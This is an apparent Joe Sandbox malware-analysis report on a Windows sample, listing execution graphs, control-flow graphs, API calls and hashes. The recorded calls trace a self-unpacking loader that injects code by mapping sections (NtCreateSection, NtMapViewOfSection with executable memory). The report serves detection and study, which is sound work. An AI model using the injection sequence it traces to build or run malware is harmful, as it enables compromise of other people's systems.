                                                                                                                                                                      execution_graph 10407 4c003c 10408 4c0049 10407->10408 10420 4c0e0f SetErrorMode SetErrorMode 10408->10420 10413 4c0265 10414 4c02ce VirtualProtect 10413->10414 10416 4c030b 10414->10416 10415 4c0439 VirtualFree 10419 4c04be LoadLibraryA 10415->10419 10416->10415 10418 4c08c7 10419->10418 10421 4c0223 10420->10421 10422 4c0d90 10421->10422 10423 4c0dad 10422->10423 10424 4c0dbb GetPEB 10423->10424 10425 4c0238 VirtualAlloc 10423->10425 10424->10425 10425->10413 10426 6ef1ad 10429 6ef1bd 10426->10429 10430 6ef1cc 10429->10430 10433 6ef95d 10430->10433 10435 6ef978 10433->10435 10434 6ef981 CreateToolhelp32Snapshot 10434->10435 10436 6ef99d Module32First 10434->10436 10435->10434 10435->10436 10437 6ef9ac 10436->10437 10438 6ef1bc 10436->10438 10440 6ef61c 10437->10440 10441 6ef647 10440->10441 10442 6ef658 VirtualAlloc 10441->10442 10443 6ef690 10441->10443 10442->10443 10443->10443 10444 402eba 10445 402ecc 10444->10445 10447 402f54 10445->10447 10448 40193e 10445->10448 10449 40194f 10448->10449 10450 401991 Sleep 10449->10450 10451 4019ac 10450->10451 10453 4019bd 10451->10453 10454 401553 10451->10454 10453->10447 10455 401563 10454->10455 10456 401608 NtDuplicateObject 10455->10456 10462 4018dd 10455->10462 10457 401625 NtCreateSection 10456->10457 10456->10462 10458 4016a5 NtCreateSection 10457->10458 10459 40164b NtMapViewOfSection 10457->10459 10461 4016d1 10458->10461 10458->10462 10459->10458 10460 40166e NtMapViewOfSection 10459->10460 10460->10458 10463 40168c 10460->10463 10461->10462 10464 4016db NtMapViewOfSection 10461->10464 10462->10453 10463->10458 10464->10462 10465 401702 NtMapViewOfSection 10464->10465 10465->10462 10466 401724 10465->10466 10466->10462 10468 401729 10466->10468 10469 40172b 10468->10469 10474 401724 10468->10474 10470 4016be NtCreateSection 10469->10470 10469->10474 10471 4016d1 10470->10471 10470->10474 10472 4016db NtMapViewOfSection 10471->10472 10471->10474 10473 401702 NtMapViewOfSection 10472->10473 10472->10474 10473->10474 10474->10462 10475 426f5c 10476 426f6c 10475->10476 10477 426f78 SetConsoleOutputCP 10476->10477 10478 426f95 SetFileAttributesW OpenWaitableTimerA 10476->10478 10479 426fb1 10476->10479 10477->10476 10478->10476 10480 426fd6 WriteConsoleOutputA 10479->10480 10481 427019 10479->10481 10480->10479 10484 426c1f 10481->10484 10485 426c2c 10484->10485 10486 426c60 GetLastError 10485->10486 10487 426c58 SetConsoleCP 10485->10487 10492 426c8e 10485->10492 10486->10485 10488 426c6f 10486->10488 10487->10486 10491 426c78 GetCompressedFileSizeA TlsSetValue 10488->10491 10488->10492 10489 426cc6 CopyFileExW AddAtomA FreeEnvironmentStringsA GetModuleHandleW EnumDateFormatsExA 10493 426d0b RtlTryEnterCriticalSection 10489->10493 10494 426d18 10489->10494 10490 426d29 10496 426d53 FreeLibrary LocalFree 10490->10496 10497 426d6d 8 API calls 10490->10497 10505 426de9 10490->10505 10491->10492 10492->10489 10492->10490 10493->10494 10494->10490 10496->10497 10497->10505 10498 426eb0 10509 426a16 LoadLibraryA 10498->10509 10499 426ea4 VirtualLock 10500 426e43 10499->10500 10500->10498 10500->10499 10502 426eb5 10510 42628b 10502->10510 10508 426276 GlobalAlloc 10505->10508 10508->10500 10509->10502 10511 426299 10510->10511 10512 4262a5 VirtualProtect 10511->10512 10513 426a10 10511->10513 10512->10511 10514 426b79 10513->10514 10521 426aa6 10514->10521 10517 426c0a 10526 426af0 10517->10526 10518 426bae 7 API calls 10518->10517 10522 426ab7 CreateJobObjectW 10521->10522 10523 426ac4 10521->10523 10522->10523 10524 426ad8 HeapFree QueryPerformanceFrequency 10523->10524 10525 426aee 10523->10525 10524->10525 10525->10517 10525->10518 10527 426b55 10526->10527 10528 426b16 10526->10528 10528->10527 10529 426b1b FreeEnvironmentStringsA 10528->10529 10530 426b37 LCMapStringW GetModuleHandleW 10528->10530 10529->10528 10530->10528

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 90 401553-4015b2 call 4011cd 102 4015b4 90->102 103 4015b7-4015bc 90->103 102->103 105 4015c2-4015d3 103->105 106 4018df-4018e7 103->106 109 4015d9-401602 105->109 110 4018dd 105->110 106->103 111 4018ec-40193b call 4011cd 106->111 109->110 119 401608-40161f NtDuplicateObject 109->119 110->111 119->110 121 401625-401649 NtCreateSection 119->121 123 4016a5-4016cb NtCreateSection 121->123 124 40164b-40166c NtMapViewOfSection 121->124 123->110 126 4016d1-4016d5 123->126 124->123 125 40166e-40168a NtMapViewOfSection 124->125 125->123 128 40168c-4016a2 125->128 126->110 129 4016db-4016fc NtMapViewOfSection 126->129 128->123 129->110 131 401702-40171e NtMapViewOfSection 129->131 131->110 134 401724 131->134 134->110 136 401724 call 401729 134->136 136->110
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 137 40156b-4015b2 call 4011cd 149 4015b4 137->149 150 4015b7-4015bc 137->150 149->150 152 4015c2-4015d3 150->152 153 4018df-4018e7 150->153 156 4015d9-401602 152->156 157 4018dd 152->157 153->150 158 4018ec-40193b call 4011cd 153->158 156->157 166 401608-40161f NtDuplicateObject 156->166 157->158 166->157 168 401625-401649 NtCreateSection 166->168 170 4016a5-4016cb NtCreateSection 168->170 171 40164b-40166c NtMapViewOfSection 168->171 170->157 173 4016d1-4016d5 170->173 171->170 172 40166e-40168a NtMapViewOfSection 171->172 172->170 175 40168c-4016a2 172->175 173->157 176 4016db-4016fc NtMapViewOfSection 173->176 175->170 176->157 178 401702-40171e NtMapViewOfSection 176->178 178->157 181 401724 178->181 181->157 183 401724 call 401729 181->183 183->157
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                      • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 184 401561-4015b2 call 4011cd 194 4015b4 184->194 195 4015b7-4015bc 184->195 194->195 197 4015c2-4015d3 195->197 198 4018df-4018e7 195->198 201 4015d9-401602 197->201 202 4018dd 197->202 198->195 203 4018ec-40193b call 4011cd 198->203 201->202 211 401608-40161f NtDuplicateObject 201->211 202->203 211->202 213 401625-401649 NtCreateSection 211->213 215 4016a5-4016cb NtCreateSection 213->215 216 40164b-40166c NtMapViewOfSection 213->216 215->202 218 4016d1-4016d5 215->218 216->215 217 40166e-40168a NtMapViewOfSection 216->217 217->215 220 40168c-4016a2 217->220 218->202 221 4016db-4016fc NtMapViewOfSection 218->221 220->215 221->202 223 401702-40171e NtMapViewOfSection 221->223 223->202 226 401724 223->226 226->202 228 401724 call 401729 226->228 228->202
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                      • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 229 40156f-4015b2 call 4011cd 237 4015b4 229->237 238 4015b7-4015bc 229->238 237->238 240 4015c2-4015d3 238->240 241 4018df-4018e7 238->241 244 4015d9-401602 240->244 245 4018dd 240->245 241->238 246 4018ec-40193b call 4011cd 241->246 244->245 254 401608-40161f NtDuplicateObject 244->254 245->246 254->245 256 401625-401649 NtCreateSection 254->256 258 4016a5-4016cb NtCreateSection 256->258 259 40164b-40166c NtMapViewOfSection 256->259 258->245 261 4016d1-4016d5 258->261 259->258 260 40166e-40168a NtMapViewOfSection 259->260 260->258 263 40168c-4016a2 260->263 261->245 264 4016db-4016fc NtMapViewOfSection 261->264 263->258 264->245 266 401702-40171e NtMapViewOfSection 264->266 266->245 269 401724 266->269 269->245 271 401724 call 401729 269->271 271->245
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 272 401583-4015b2 call 4011cd 281 4015b4 272->281 282 4015b7-4015bc 272->282 281->282 284 4015c2-4015d3 282->284 285 4018df-4018e7 282->285 288 4015d9-401602 284->288 289 4018dd 284->289 285->282 290 4018ec-40193b call 4011cd 285->290 288->289 298 401608-40161f NtDuplicateObject 288->298 289->290 298->289 300 401625-401649 NtCreateSection 298->300 302 4016a5-4016cb NtCreateSection 300->302 303 40164b-40166c NtMapViewOfSection 300->303 302->289 305 4016d1-4016d5 302->305 303->302 304 40166e-40168a NtMapViewOfSection 303->304 304->302 307 40168c-4016a2 304->307 305->289 308 4016db-4016fc NtMapViewOfSection 305->308 307->302 308->289 310 401702-40171e NtMapViewOfSection 308->310 310->289 313 401724 310->313 313->289 315 401724 call 401729 313->315 315->289
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                      • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 316 401587-4015b2 call 4011cd 320 4015b4 316->320 321 4015b7-4015bc 316->321 320->321 323 4015c2-4015d3 321->323 324 4018df-4018e7 321->324 327 4015d9-401602 323->327 328 4018dd 323->328 324->321 329 4018ec-40193b call 4011cd 324->329 327->328 337 401608-40161f NtDuplicateObject 327->337 328->329 337->328 339 401625-401649 NtCreateSection 337->339 341 4016a5-4016cb NtCreateSection 339->341 342 40164b-40166c NtMapViewOfSection 339->342 341->328 344 4016d1-4016d5 341->344 342->341 343 40166e-40168a NtMapViewOfSection 342->343 343->341 346 40168c-4016a2 343->346 344->328 347 4016db-4016fc NtMapViewOfSection 344->347 346->341 347->328 349 401702-40171e NtMapViewOfSection 347->349 349->328 352 401724 349->352 352->328 354 401724 call 401729 352->354 354->328
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec31b479fd08731287e8d0e55fe4d339ef2a67852c713b723290c7befe848b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 370 401729 371 40172b 370->371 372 40172f-40174d 370->372 371->372 373 40172d 371->373 385 401764 372->385 386 401755-401778 372->386 373->372 375 4016be-4016cb NtCreateSection 373->375 377 4016d1-4016d5 375->377 378 4018dd-40193b call 4011cd 375->378 377->378 381 4016db-4016fc NtMapViewOfSection 377->381 381->378 384 401702-40171e NtMapViewOfSection 381->384 384->378 388 401724 384->388 385->386 395 40177b-4017b8 386->395 388->378 392 401724 call 401729 388->392 392->378 412 4017ba-4017e3 395->412 417 4017e5-4017eb 412->417 418 4017ed 412->418 419 4017f3-4017f9 417->419 418->419 420 401809-40180d 419->420 421 4017fb-401807 419->421 420->419 422 40180f-401814 420->422 421->420 423 401816 call 40181b 422->423 424 40187c-40188b 422->424 425 40188e-401891 424->425 427 401893-40189d 425->427 428 4018bb-4018d4 425->428 429 4018a0-4018a9 427->429 428->378 430 4018b7 429->430 431 4018ab-4018b5 429->431 430->429 432 4018b9 430->432 431->430 432->425
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 33071139-0
                                                                                                                                                                      • Opcode ID: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
                                                                                                                                                                      • Opcode Fuzzy Hash: b6b7661ceeaa473891237c732f5305db374e8f07cd43916073c5c2763a81e662
                                                                                                                                                                      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 42628b-426297 1 426299-42629f 0->1 2 426a03-426a0a 1->2 3 4262a5-4269fd VirtualProtect 1->3 2->1 4 426a10-426a15 2->4 3->2
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(00000040,?,0BB7EA7B,?,?,52860AB1,?,?,34026A25), ref: 004269FD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                      • API String ID: 544645111-975362989
                                                                                                                                                                      • Opcode ID: 35d728c95aa6d0a75f2c7cf45eec9f2d0d017f28882eafd102482a2d68368c15
                                                                                                                                                                      • Instruction ID: d72fbdaad144419308e756cdf284ac6d7789ac6a6b4f3aee9be819b8f8910974
                                                                                                                                                                      • Opcode Fuzzy Hash: 35d728c95aa6d0a75f2c7cf45eec9f2d0d017f28882eafd102482a2d68368c15
                                                                                                                                                                      • Instruction Fuzzy Hash: 4702EAB480536CDBDB20CF86EA857CCBBB0BB11704F6186D8D9196B214D7724A85CF89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 5 4c003c-4c0047 6 4c004c-4c0263 call 4c0a3f call 4c0e0f call 4c0d90 VirtualAlloc 5->6 7 4c0049 5->7 22 4c028b-4c0292 6->22 23 4c0265-4c0289 call 4c0a69 6->23 7->6 25 4c02a1-4c02b0 22->25 27 4c02ce-4c03c2 VirtualProtect call 4c0cce call 4c0ce7 23->27 25->27 28 4c02b2-4c02cc 25->28 34 4c03d1-4c03e0 27->34 28->25 35 4c0439-4c04b8 VirtualFree 34->35 36 4c03e2-4c0437 call 4c0ce7 34->36 38 4c04be-4c04cd 35->38 39 4c05f4-4c05fe 35->39 36->34 41 4c04d3-4c04dd 38->41 42 4c077f-4c0789 39->42 43 4c0604-4c060d 39->43 41->39 45 4c04e3-4c0505 41->45 46 4c078b-4c07a3 42->46 47 4c07a6-4c07b0 42->47 43->42 48 4c0613-4c0637 43->48 56 4c0517-4c0520 45->56 57 4c0507-4c0515 45->57 46->47 49 4c086e-4c08be LoadLibraryA 47->49 50 4c07b6-4c07cb 47->50 51 4c063e-4c0648 48->51 55 4c08c7-4c08f9 49->55 53 4c07d2-4c07d5 50->53 51->42 54 4c064e-4c065a 51->54 58 4c0824-4c0833 53->58 59 4c07d7-4c07e0 53->59 54->42 60 4c0660-4c066a 54->60 61 4c08fb-4c0901 55->61 62 4c0902-4c091d 55->62 63 4c0526-4c0547 56->63 57->63 67 4c0839-4c083c 58->67 64 4c07e4-4c0822 59->64 65 4c07e2 59->65 66 4c067a-4c0689 60->66 61->62 68 4c054d-4c0550 63->68 64->53 65->58 69 4c068f-4c06b2 66->69 70 4c0750-4c077a 66->70 67->49 71 4c083e-4c0847 67->71 77 4c0556-4c056b 68->77 78 4c05e0-4c05ef 68->78 72 4c06ef-4c06fc 69->72 73 4c06b4-4c06ed 69->73 70->51 74 4c0849 71->74 75 4c084b-4c086c 71->75 79 4c06fe-4c0748 72->79 80 4c074b 72->80 73->72 74->49 75->67 81 4c056d 77->81 82 4c056f-4c057a 77->82 78->41 79->80 80->66 81->78 85 4c057c-4c0599 82->85 86 4c059b-4c05bb 82->86 89 4c05bd-4c05db 85->89 86->89 89->68
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004C024D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1984120576.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_4c0000_ufhjbuw.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
